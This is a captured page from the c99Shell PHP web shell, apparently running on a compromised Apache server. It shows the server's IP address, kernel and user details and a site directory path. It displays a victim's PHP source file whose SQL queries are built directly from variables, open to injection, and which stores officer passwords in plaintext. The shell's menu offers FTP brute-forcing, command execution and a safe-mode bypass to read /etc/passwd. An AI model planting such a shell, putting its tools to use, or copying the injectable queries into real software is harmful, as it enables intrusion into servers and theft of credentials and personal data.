110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk_joice2222/ums/ drwxr-xr-x Free 52.33 GB of 127.8 GB (40.95%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mistk_joice2222/ums/ drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: clsOfficer.php (4.21 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

c=$c->c;
	$this->DB=$c->db;
}

function Save(){
//--ўйНБЩЕг№НкНєаЁкЎа»з№ўйНБЩЕгЛБиЛГЧНўйНБЩЕаґФБ --1:ўйНБЩЕгЛБи  2:ўйНБЩЕаґФБ
	if ($this->status==1){
		//uncomment a line below if your table use ID as running number
		$this->officerId=$this->GetNextCode();
		$sql = "insert into Officer values(
			'$this->officerId',
 			'$this->officerCode',
 			'$this->officerPassword',
 			'$this->officerType',
 			'$this->prefixId',
 			'$this->officerName',
 			'$this->officerSurname',
 			'$this->officerNameEng',
 			'$this->officerSurnameEng',
 			'$this->officerEmail',
 			'$this->officerStatus',
 			'$this->remark',
 			'$this->contactAddress',
 			'$this->contactPhone'
			)";
	}else {
		$sql = "update Officer set 
			officerCode='$this->officerCode', 
			officerPassword='$this->officerPassword', 
			officerType='$this->officerType', 
			prefixId='$this->prefixId', 
			officerName='$this->officerName', 
			officerSurname='$this->officerSurname', 
			officerNameEng='$this->officerNameEng', 
			officerSurnameEng='$this->officerSurnameEng', 
			officerEmail='$this->officerEmail', 
			officerStatus='$this->officerStatus', 
			remark='$this->remark', 
			contactAddress='$this->contactAddress', 
			contactPhone='$this->contactPhone' 
			where officerId='$this->officerId'";
	}
	return $this->Dml($sql);
}

function Delete(){
//--ЕєўйНБЩЕаґФБг№НкНєаЁкЎ, а»з№ЎТГЕєўйНБЩЕ·ХЕР 1 аГ¤НГмґ
//--µйН§аГХВЎаБёНґµТБЕУґСєґС§№Хй SearchByKey()-->GetRecord()-->Delete()
	return $this->Dml("delete from Officer where officerId='$this->officerId'");
}

function GetNextCode(){
//--ЛТ¤иТКЩ§КШґўН§їФЕґм·ХигЄйа»з№¤ХВмўН§µТГТ§ г№ЕСЎЙіР auto increment
//--µйН§а»з№їФЕґмЄ№ФґµСЗаЕўЁУ№З№аµзБа·иТ№Сй№ бЕРдБидґйЎУЛ№ґГЛСКаН§·Т§ЁНАТѕ
	$this->SetQuery("select max(officerId) as num from Officer");
	if ($result=$this->GetResult()) {
		return $result['num']+1;
	}
}

function RSOfficer(){
//--аБёНґ·ХиўЦй№µй№ґйЗВ RS (ResultSet) БХ¤ЗТБЛБТВЗиТЁРдґйГСєўйНБЩЕЎЕСєБТЁТЎЎТГ select БТЎЎЗиТ 1 аГ¤НГмґ
//--ЁРµйН§аГХВЎаБёНґ GetRecord() ґйЗВаКБН №УўйНБЩЕЁТЎ ResultSet аўйТНкНєаЁкЎ
//--вґВКТБТГ¶аѕФиБаБёНґдґйµТБµйН§ЎТГ бµиµйН§ўЦй№µй№ґйЗВ RS
	$this->SetQuery("select * from Officer order by officerId");
}

function GetRecord(){
//--№УўйНБЩЕЁТЎ ResultSet БТЎУЛ№ґгЛйЎСєбНµ·ГФєФЗµмўН§НкНєаЁзЎ
//--аГХВЎ GetRecord() Л№Ци§¤ГСй§ ЁРаЕЧиН№µСЗЄХйаГ¤НГмґд»НХЎЛ№Ци§аГ¤НГмґ
	if ($this->result = $this->GetResult()) {
		$this->officerId = $this->result['officerId'];
		$this->officerCode = $this->result['officerCode'];
		$this->officerPassword = $this->result['officerPassword'];
		$this->officerType = $this->result['officerType'];
		$this->prefixId = $this->result['prefixId'];
		$this->officerName = $this->result['officerName'];
		$this->officerSurname = $this->result['officerSurname'];
		$this->officerNameEng = $this->result['officerNameEng'];
		$this->officerSurnameEng = $this->result['officerSurnameEng'];
		$this->officerEmail = $this->result['officerEmail'];
		$this->officerStatus = $this->result['officerStatus'];
		$this->remark = $this->result['remark'];
		$this->contactAddress = $this->result['contactAddress'];
		$this->contactPhone = $this->result['contactPhone'];
		return 1;
	}else {
		return 0;
	}
}

function SearchByKey($xKey){
//--¤й№ЛТўйНБЩЕµТБ PK µйН§ГРєШѕТГТБФаµНГмґйЗВ бЕРµйН§µТБґйЗВаБёНґ GetRecord() аКБН
	if ($this->SetQuery("select * from Officer where officerId= '$xKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
//****************** You can add new functions below **********************//
function SearchByOfficerCode($code){
//--¤й№ЛТўйНБЩЕµТБ PK µйН§ГРєШѕТГТБФаµНГмґйЗВ бЕРµйН§µТБґйЗВаБёНґ GetRecord() аКБН
	if ($this->SetQuery("select * from Officer where officerCode= '$code'")){ 
		return 1;
	}else {
		return 0;
	}
}

} //--End class Officer--

?>

bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--